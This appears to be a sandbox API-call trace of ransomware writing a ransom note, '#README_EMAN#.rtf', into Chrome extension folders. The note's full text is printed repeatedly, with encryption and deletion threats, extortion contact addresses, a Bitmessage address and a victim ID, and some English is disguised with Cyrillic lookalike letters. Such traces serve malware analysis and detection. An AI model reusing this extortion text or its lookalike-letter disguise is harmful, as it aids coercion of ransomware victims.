l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.318] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.318] CloseHandle (hObject=0x2e8) returned 1 [0289.318] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0289.318] GetLastError () returned 0x2 [0289.318] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 